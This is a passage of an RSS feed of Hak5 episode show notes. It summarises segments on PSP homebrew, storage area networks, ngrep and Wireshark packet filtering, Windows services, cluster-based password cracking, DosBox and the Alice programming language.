<p><a class="mov" href="http://www.podtrac.com/pts/redirect.mp4/bitcast-a.bitgravity.com/revision3/web/hak5/0515/hak5--0515--cutter--hd.h264.mp4">Download HD</a> <a class="mov" href="http://www.podtrac.com/pts/redirect.mp4/bitcast-a.bitgravity.com/revision3/web/hak5/0515/hak5--0515--cutter--large.h264.mp4">Download MP4</a> <a class="xvid" href="http://www.podtrac.com/pts/redirect.avi/bitcast-a.bitgravity.com/revision3/web/hak5/0515/hak5--0515--cutter--large.xvid.avi">Download XviD</a> <a class="wmv" href="http://www.podtrac.com/pts/redirect.wmv/bitcast-a.bitgravity.com/revision3/web/hak5/0515/hak5--0515--cutter--large.wmv9.wmv">Download WMV</a></p>
<p><span id="more-1148"></span></p>
<p><embed type="application/x-shockwave-flash" src="http://revision3.com/player-v2820" allowfullscreen="true" width="555" height="312"  /></p>
<p>While Shannon&#8217;s on vacation our friend <a href="http://www.jenncutter.com" target="_blank">Jenn Cutter</a> from <a href="http://www.openalpha.tv" target="_blank">Open Alpha</a> joins us to talk about the <a href="http://www.youtube.com/watch?v=Qn2Z8bYr3tE" target="_blank">recent developments</a> in PSP hacking and homebrew. </p>
<p>
<blockquote>The PSP homebrew scene has grown more interesting over the past little while since the user base has been sectioned off into different camps based on the particular unit they purchased and whatever firmware they are using. Thanks to the efforts of Team Typhoon, ChickHEN (homebrew enabler) permits owners of all models to run the unofficial apps and games they&#8217;ve grown to love without touching the flash of the PSP, so there&#8217;s no worrying about turning it into a brick. No one likes expensive bricks. Keep in mind that ChickHEN is not a piracy tool so don&#8217;t expect to run any type of backups though it. <a href="http://davee.x-fusion.co.uk/">Davee</a> has the lowdown on the latest release which can be downloaded <a href="http://downloads.exophase.com/506/chickhen-homebrew-enabler-r2/">here</a>. If you are curious or sceptical, feel free to check out <a href="http://www.youtube.com/watch?v=MTJOWkNq1vw">video proof</a> that it works on PSP 3000s.</p></blockquote>
<p><i>&#8211;<a href="http://www.jenncutter.com" target="_blank">Jenn Cutter</a></i></p>
<p>Matt answers your questions about <a href="http://en.wikipedia.org/wiki/Storage_area_network" target="_blank">storage area networks</a> and recommends <a href="http://www.qnap.com" target="_blank">QNAP</a>. If you&#8217;re feeling hands on rolling your own is a great option too. Matt points out his favorite hardware like <a href="http://www.3ware.com" target="_blank">3Ware RAID cards</a>, <a href="http://www.google.com/products/catalog?q=transcend+4+GB+Internal+hard+drive&#038;hl=en&#038;cid=4184283609300328383&#038;sa=title#ps-sellers" target="_blank">Transcend IDE Flash Modules</a>, and the <a href="http://developer.intel.com/Assets/PDF/prodbrief/ssr212mc2.pdf" target="_blank">Intel Storage Server SSR212MC2</a>. Software wise it&#8217;s worth investigating <a href="http://www.freenas.org" target="_blank">Freenas</a>, <a href="http://www.openfiler.com" target="_blank"> and <a href="http://www.datacore.com/products/prod-sanmelody.asp" target="_blank">SAN Melody</a>.</p>
<p>Continuing on with <a href="http://www.dualcoremusic.com" target="_blank">Eighty</a>&#8216;s segment on <a href="http://www.hak5.org/episodes/episode-513" target="_blank">extracting windows executables from packet captures</a> and <a href="http://www.room362.com" target="_blank">Mubix</a>&#8216;s segment on <a href="http://www.hak5.org/episodes/episode-514" target="_blank">network tap analizers</a>, Darren&#8217;s taking a look at the open source tool <a href="http://ngrep.sourceforge.net" target="_blank">ngrep</a>. If you&#8217;re familiar with <a href="http://www.ss64.com/bash/grep.html" target="_blank">grep</a> you&#8217;ll be at home with this tool. Darren demonstrates using the tool to filter packets from a live capture using a <a href="http://www.hak5.org/episodes/episode-505" target="_blank">Network Monkey</a>. Alternatively it can be used with <a href="http://www.tcpdump.org/" target="_blank">pcap</a> files.</p>
<p>Don&#8217;t forget to check out our latest contest at <a href="http://www.hak5.org/yourlan/" target="_blank">Hak5.org/yourlan</a> where the most creative network will win cozy Hak5 gear from our newly opened <a href="http://www.hak5.org/hakshop/" target="_blank">HakShop</a></p>
]]></content:encoded>
			<wfw:commentRss>http://Hak5.org/episodes/episode-515-build-your-own-san-psp-hacking-net-grep/feed</wfw:commentRss>
		<slash:comments>32</slash:comments>
<enclosure url="http://www.podtrac.com/pts/redirect.mp4/bitcast-a.bitgravity.com/revision3/web/hak5/0515/hak5--0515--cutter--hd.h264.mp4" length="646809947" type="video/mp4" />
<enclosure url="http://www.podtrac.com/pts/redirect.mp4/bitcast-a.bitgravity.com/revision3/web/hak5/0515/hak5--0515--cutter--large.h264.mp4" length="358708512" type="video/mp4" />
<enclosure url="http://www.podtrac.com/pts/redirect.avi/bitcast-a.bitgravity.com/revision3/web/hak5/0515/hak5--0515--cutter--large.xvid.avi" length="394809390" type="video/x-msvideo" />
<enclosure url="http://www.podtrac.com/pts/redirect.wmv/bitcast-a.bitgravity.com/revision3/web/hak5/0515/hak5--0515--cutter--large.wmv9.wmv" length="388009068" type="video/x-ms-wmv" />
		</item>
		<item>
		<title>Episode 409 &#8212; HappyHakoween: Password Cracking Clusters, Remote Control Services, Wireshark Packet Filtering</title>
		<link>http://Hak5.org/episodes/episode-409</link>
		<comments>http://Hak5.org/episodes/episode-409#comments</comments>
		<pubDate>Wed, 29 Oct 2008 16:29:25 +0000</pubDate>
		<dc:creator>Darren Kitchen</dc:creator>
				<category><![CDATA[Episodes]]></category>
		<category><![CDATA[Season 4]]></category>
		<category><![CDATA[beowulf cluster]]></category>
		<category><![CDATA[cluster]]></category>
		<category><![CDATA[crack]]></category>
		<category><![CDATA[ethereal]]></category>
		<category><![CDATA[grid computing]]></category>
		<category><![CDATA[Headers]]></category>
		<category><![CDATA[IP]]></category>
		<category><![CDATA[lan man]]></category>
		<category><![CDATA[mosix]]></category>
		<category><![CDATA[ntlm]]></category>
		<category><![CDATA[Packet]]></category>
		<category><![CDATA[Packet Sniff]]></category>
		<category><![CDATA[Panel Dameon]]></category>
		<category><![CDATA[password]]></category>
		<category><![CDATA[pxe]]></category>
		<category><![CDATA[service.msc]]></category>
		<category><![CDATA[srvany]]></category>
		<category><![CDATA[tcp]]></category>
		<category><![CDATA[Windows Service]]></category>
		<category><![CDATA[wireshark]]></category>

		<guid isPermaLink="false">http://www.hak5.org/?p=402</guid>
		<description><![CDATA[<embed loop="false" quality="high" bgcolor="#171717" width="555" height="337" name="rev3_player" id="rev3_player" align="middle" allowScriptAccess="always" allowFullScreen="true" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" src="http://bitcast-a.bitgravity.com/revision3/swf/rev3_player.swf?AutoPlay=off&#038;Buffer=10&#038;File=http://www.podtrac.com/pts/redirect.flv/bitcast-a.bitgravity.com/revision3/flv/hak5/0409/hak5--0409--HappyHakoween--large.fl8.flv&#038;ScrubMode=advanced&#038;Thumb=http://bitcast-a.bitgravity.com/revision3/images/shows/hak5/0409/hak5--0409--HappyHakoween--large.thumb.jpg&#038;DefaultRatio=0.56&#038;AutoSize=off&#038;allowFullScreen=true&#038;AutoPlay=off&#038;videoId=1863&#038;fwVideoDuration=2710&#038;fwNumSlots=5&#038;adSlotPosition_0=180&#038;adSlotClass_0=OVERLAY&#038;adSlotProfile_0=R3_overlay&#038;adSlotPosition_1=780&#038;adSlotClass_1=OVERLAY&#038;adSlotProfile_1=R3_overlay&#038;adSlotPosition_2=1460&#038;adSlotClass_2=OVERLAY&#038;adSlotProfile_2=R3_overlay&#038;adSlotPosition_3=1860&#038;adSlotClass_3=OVERLAY&#038;adSlotProfile_3=R3_overlay&#038;adSlotPosition_4=2280&#038;adSlotClass_4=OVERLAY&#038;adSlotProfile_4=R3_overlay&#038;PostRoll=" base="http://bitcast-a.bitgravity.com/revision3/swf/" />]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2FHak5.org%2Fepisodes%2Fepisode-409"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2FHak5.org%2Fepisodes%2Fepisode-409&amp;source=Hak5&amp;style=normal&amp;service=bit.ly&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p><a href="http://www.hak5.org/episodes/episode-409/"><img src="http://bitcast-a.bitgravity.com/revision3/images/shows/hak5/0409/hak5--0409--HappyHakoween--medium.thumb.jpg" border="0"/></a><br />Matt shows us how to turn anything into a service and provide a web frontend to manage them windows server, great for game server administration. Chris Gerling wraps up his three part series on Packet Sniffing with Wireshark techniques for packet filtering. Darren harnesses the CPU power of the HakHouse for good or evil to demonstrate cluster computing. Plus details on our Hak5 Halloween LAN Party!<br />[ <a href="http://www.podtrac.com/pts/redirect.mp4/bitcast-a.bitgravity.com/revision3/web/hak5/0409/hak5--0409--HappyHakoween--large.h264.mp4">MP4</a> | <a href="http://www.podtrac.com/pts/redirect.avi/bitcast-a.bitgravity.com/revision3/web/hak5/0409/hak5--0409--HappyHakoween--large.xvid.avi">XviD</a> | <a href="http://www.podtrac.com/pts/redirect.wmv/bitcast-a.bitgravity.com/revision3/web/hak5/0409/hak5--0409--HappyHakoween--large.wmv9.wmv">WMV</a> ]<span id="more-402"></span></p>
<div style="clear:both;"></div>
<h2>Watch</h2>
<p><embed loop="false" quality="high" bgcolor="#171717" width="555" height="337" name="rev3_player" id="rev3_player" align="middle" allowScriptAccess="always" allowFullScreen="true" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" src="http://bitcast-a.bitgravity.com/revision3/swf/rev3_player.swf?AutoPlay=off&#038;Buffer=10&#038;File=http://www.podtrac.com/pts/redirect.flv/bitcast-a.bitgravity.com/revision3/flv/hak5/0409/hak5--0409--HappyHakoween--large.fl8.flv&#038;ScrubMode=advanced&#038;Thumb=http://bitcast-a.bitgravity.com/revision3/images/shows/hak5/0409/hak5--0409--HappyHakoween--large.thumb.jpg&#038;DefaultRatio=0.56&#038;AutoSize=off&#038;allowFullScreen=true&#038;AutoPlay=off&#038;videoId=1863&#038;fwVideoDuration=2710&#038;fwNumSlots=5&#038;adSlotPosition_0=180&#038;adSlotClass_0=OVERLAY&#038;adSlotProfile_0=R3_overlay&#038;adSlotPosition_1=780&#038;adSlotClass_1=OVERLAY&#038;adSlotProfile_1=R3_overlay&#038;adSlotPosition_2=1460&#038;adSlotClass_2=OVERLAY&#038;adSlotProfile_2=R3_overlay&#038;adSlotPosition_3=1860&#038;adSlotClass_3=OVERLAY&#038;adSlotProfile_3=R3_overlay&#038;adSlotPosition_4=2280&#038;adSlotClass_4=OVERLAY&#038;adSlotProfile_4=R3_overlay&#038;PostRoll=" base="http://bitcast-a.bitgravity.com/revision3/swf/" /></p>
<h2>Show Notes</h2>
<p><a href="http://www.mattlestock.com" target="_blank">Matt Lestock</a> turns any windows application into a service using <a href="http://support.microsoft.com/kb/137890" target="_blank">instsrv and srvany</a> and demonstrates how we use this technique, coupled with <a href="http://www.paneldaemon.com/" target="_blank">Panel Daemon</a> to delegate game server administration at the Hak5 playground.</p>
<p><a href="http://www.chrisgerling.com" target="_blank">Chris Gerling</a> shows us some packet filtering techniques using the network analyzer <a href="http://www.wireshark.org" target="_blank">Wireshark</a>. He covers capture filters, display filters, colors and statistics. Read more on packet sniffing on his blog at <a href="http://www.chrisgerling.com" target="_blank">ChrisGerling.com</a></p>
<p><a href="http://www.darrenkitchen.net" target="_blank">Darren Kitchen</a> talks about parallel computing. He touches on grid computing and massively parallel processors though he mainly focuses on clustering. Darren demonstrates simple windows password cracking techniques using an openMosix based image and discusses the theory behind setup. Darren has a lot of further reading for you to check out on <a href="http://www.darrenkitchen.net" target="_blank">his blog</a> and would like to hear your feedback about building the Hak5 beowulf cluster!</p>
<p>And on a production note: We&#8217;ve switched over from a standard-def composite based video mixing solution to a high-def HDMI based system. Unfortunately until we get a Mac Pro and switch to Final Cut Pro for editing we&#8217;re unable to release a 720p version of Hak5. But we&#8217;re well on our way to bringing you guys truly high def technolust thanks to everyone who has continued to <a href="http://www.hak5.org/stickers/">support this cause</a>. Thanks!</p>
</div>
</div>
]]></content:encoded>
			<wfw:commentRss>http://Hak5.org/episodes/episode-409/feed</wfw:commentRss>
		<slash:comments>15</slash:comments>
<enclosure url="http://www.podtrac.com/pts/redirect.mp4/bitcast-a.bitgravity.com/revision3/web/hak5/0409/hak5--0409--HappyHakoween--large.h264.mp4" length="383516843" type="video/mp4" />
<enclosure url="http://www.podtrac.com/pts/redirect.avi/bitcast-a.bitgravity.com/revision3/web/hak5/0409/hak5--0409--HappyHakoween--large.xvid.avi" length="347637444" type="video/x-msvideo" />
<enclosure url="http://www.podtrac.com/pts/redirect.wmv/bitcast-a.bitgravity.com/revision3/web/hak5/0409/hak5--0409--HappyHakoween--large.wmv9.wmv" length="448609572" type="video/x-ms-wmv" />
		</item>
		<item>
		<title>Episode 408 &#8212; Dissect TCP/IP, Dos Box, Alice, Day-Con, and Fon Batteries</title>
		<link>http://Hak5.org/episodes/episode-408</link>
		<comments>http://Hak5.org/episodes/episode-408#comments</comments>
		<pubDate>Wed, 22 Oct 2008 16:26:25 +0000</pubDate>
		<dc:creator>Darren Kitchen</dc:creator>
				<category><![CDATA[Episodes]]></category>
		<category><![CDATA[Season 4]]></category>
		<category><![CDATA[Abandonware]]></category>
		<category><![CDATA[Alice]]></category>
		<category><![CDATA[Battery]]></category>
		<category><![CDATA[Day-Con]]></category>
		<category><![CDATA[DayCon]]></category>
		<category><![CDATA[DOS]]></category>
		<category><![CDATA[Dos Box]]></category>
		<category><![CDATA[DOS Games]]></category>
		<category><![CDATA[Emulation]]></category>
		<category><![CDATA[Emulator]]></category>
		<category><![CDATA[ethereal]]></category>
		<category><![CDATA[Fon]]></category>
		<category><![CDATA[Headers]]></category>
		<category><![CDATA[IP]]></category>
		<category><![CDATA[Jasager]]></category>
		<category><![CDATA[Ninja]]></category>
		<category><![CDATA[Packet]]></category>
		<category><![CDATA[Packet Sniff]]></category>
		<category><![CDATA[Pineapple]]></category>
		<category><![CDATA[Programming]]></category>
		<category><![CDATA[tcp]]></category>
		<category><![CDATA[wireshark]]></category>

		<guid isPermaLink="false">http://www.hak5.org/?p=396</guid>
		<description><![CDATA[<embed loop="false" quality="high" bgcolor="#171717" width="555" height="337" name="rev3_player" id="rev3_player" align="middle" allowScriptAccess="always" allowFullScreen="true" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" src="http://bitcast-a.bitgravity.com/revision3/swf/rev3_player.swf?AutoPlay=off&#038;Buffer=10&#038;File=http://www.podtrac.com/pts/redirect.flv/bitcast-a.bitgravity.com/revision3/flv/hak5/0408/hak5--0408--BuildingPackets--large.fl8.flv&#038;ScrubMode=advanced&#038;Thumb=http://bitcast-a.bitgravity.com/revision3/images/shows/hak5/0408/hak5--0408--BuildingPackets--large.thumb.jpg&#038;DefaultRatio=0.56&#038;AutoSize=off&#038;allowFullScreen=true&#038;AutoPlay=off&#038;videoId=1862&#038;fwVideoDuration=2544&#038;fwNumSlots=5&#038;adSlotPosition_0=180&#038;adSlotClass_0=OVERLAY&#038;adSlotProfile_0=R3_overlay&#038;adSlotPosition_1=600&#038;adSlotClass_1=OVERLAY&#038;adSlotProfile_1=R3_overlay&#038;adSlotPosition_2=1020&#038;adSlotClass_2=OVERLAY&#038;adSlotProfile_2=R3_overlay&#038;adSlotPosition_3=1800&#038;adSlotClass_3=OVERLAY&#038;adSlotProfile_3=R3_overlay&#038;adSlotPosition_4=2220&#038;adSlotClass_4=OVERLAY&#038;adSlotProfile_4=R3_overlay&#038;PostRoll=" base="http://bitcast-a.bitgravity.com/revision3/swf/" />]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2FHak5.org%2Fepisodes%2Fepisode-408"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2FHak5.org%2Fepisodes%2Fepisode-408&amp;source=Hak5&amp;style=normal&amp;service=bit.ly&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p><a href="http://www.hak5.org/episodes/episode-408/"><img src="http://bitcast-a.bitgravity.com/revision3/images/shows/hak5/0408/hak5--0408--BuildingPackets--medium.thumb.jpg" border="0"/></a><br />Chris Gerling breaks down IP and TCP headers with Wireshark and building blocks. Shannon Morse shows us DosBox, a free IBM PC DOS emulator. Christine Bourquin talks about Alice, a teaching programming language for beginners. Darren Kitchen summarises his experience at Day-Con and answers some questions about Fon batteries. [ <a href="http://www.podtrac.com/pts/redirect.mp4/bitcast-a.bitgravity.com/revision3/web/hak5/0408/hak5--0408--BuildingPackets--large.h264.mp4">MP4</a> | <a href="http://www.podtrac.com/pts/redirect.avi/bitcast-a.bitgravity.com/revision3/web/hak5/0408/hak5--0408--BuildingPackets--large.xvid.avi">XviD</a> | <a href="http://www.podtrac.com/pts/redirect.wmv/bitcast-a.bitgravity.com/revision3/web/hak5/0408/hak5--0408--BuildingPackets--large.wmv9.wmv">WMV</a> ]<span id="more-396"></span></p>
<div style="clear:both;"></div>
<h2>Watch</h2>
<p><embed loop="false" quality="high" bgcolor="#171717" width="555" height="337" name="rev3_player" id="rev3_player" align="middle" allowScriptAccess="always" allowFullScreen="true" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" src="http://bitcast-a.bitgravity.com/revision3/swf/rev3_player.swf?AutoPlay=off&#038;Buffer=10&#038;File=http://www.podtrac.com/pts/redirect.flv/bitcast-a.bitgravity.com/revision3/flv/hak5/0408/hak5--0408--BuildingPackets--large.fl8.flv&#038;ScrubMode=advanced&#038;Thumb=http://bitcast-a.bitgravity.com/revision3/images/shows/hak5/0408/hak5--0408--BuildingPackets--large.thumb.jpg&#038;DefaultRatio=0.56&#038;AutoSize=off&#038;allowFullScreen=true&#038;AutoPlay=off&#038;videoId=1862&#038;fwVideoDuration=2544&#038;fwNumSlots=5&#038;adSlotPosition_0=180&#038;adSlotClass_0=OVERLAY&#038;adSlotProfile_0=R3_overlay&#038;adSlotPosition_1=600&#038;adSlotClass_1=OVERLAY&#038;adSlotProfile_1=R3_overlay&#038;adSlotPosition_2=1020&#038;adSlotClass_2=OVERLAY&#038;adSlotProfile_2=R3_overlay&#038;adSlotPosition_3=1800&#038;adSlotClass_3=OVERLAY&#038;adSlotProfile_3=R3_overlay&#038;adSlotPosition_4=2220&#038;adSlotClass_4=OVERLAY&#038;adSlotProfile_4=R3_overlay&#038;PostRoll=" base="http://bitcast-a.bitgravity.com/revision3/swf/" /></p>
<h2>Show Notes</h2>
<p><a href="http://www.chrisgerling.com">Chris Gerling</a> dives into the structure of IP and TCP headers in part two of his three part series on packet sniffing. He covers everything from source ports to checksums and everything inbetween offering insight into TCP packets in plain English. Then in part three he covers basic Wireshark usage and advanced techniques. Read more on packet sniffing on his blog at <a href="http://www.chrisgerling.com">ChrisGerling.com</a></p>
<p><a href="http://www.snubsie.com">Shannon Morse</a> shares with us <a href="http://www.dosbox.com">DosBox</a>, the free and open source IBM PC emulator that allows you to break out those old floppies and play your DOS games once again. While we wait for DNF, anyone for a Duke Nukem 3D deathmatch?</p>
<p><a href="http://www.christinemelissa.com">Christine Bourquin</a> demos <a href="http://www.alice.org">Alice</a>, an innovative 3D programming language that makes it easy to teach programming using a simple drag-and-drop interface. Perfect for the next generation of computer scientists.</p>
<p><a href="http://www.darrenkitchen.net">Darren Kitchen</a> brings us his review of <a href="http://www.day-con.org">Day-Con</a> with photos courtesy of the <a href="http://n0where.org/security-twits/">security twits</a>. He also talks about Jasager <a href="http://hak5.org/forums/index.php?showforum=49">batteries</a> both big and small.</p>
<p>And on a production note: We&#8217;ve switched over from a standard-def composite based video mixing solution to a high-def HDMI based system. We&#8217;re not ready to release the full 720p quite yet as we&#8217;re ironing out (read: developing on the fly) the post production process but in the mean time we&#8217;ve got damn good looking 480p and we&#8217;re looking for your feedback. Thanks a million to everyone who has <a href="http://www.hak5.org/stickers/">donated</a> and helped make this happen!</p>
</div>
</div>
]]></content:encoded>
			<wfw:commentRss>http://Hak5.org/episodes/episode-408/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
<enclosure url="http://www.podtrac.com/pts/redirect.mp4/bitcast-a.bitgravity.com/revision3/web/hak5/0408/hak5--0408--BuildingPackets--large.h264.mp4" length="360801245" type="video/mp4" />
<enclosure url="http://www.podtrac.com/pts/redirect.avi/bitcast-a.bitgravity.com/revision3/web/hak5/0408/hak5--0408--BuildingPackets--large.xvid.avi" length="441959774" type="video/x-msvideo" />
<enclosure url="http://www.podtrac.com/pts/redirect.wmv/bitcast-a.bitgravity.com/revision3/web/hak5/0408/hak5--0408--BuildingPackets--large.wmv9.wmv" length="418296984" type="video/x-ms-wmv" />
		</item>
	</channel>
</rss>
<!-- This Quick Cache file was built for (  hak5.org/tag/packet/feed ) in 1.03358 seconds, on May 23rd, 2012 at 10:11 pm UTC. -->
<!-- This Quick Cache file will automatically expire ( and be re-built automatically ) on May 23rd, 2012 at 11:11 pm UTC -->
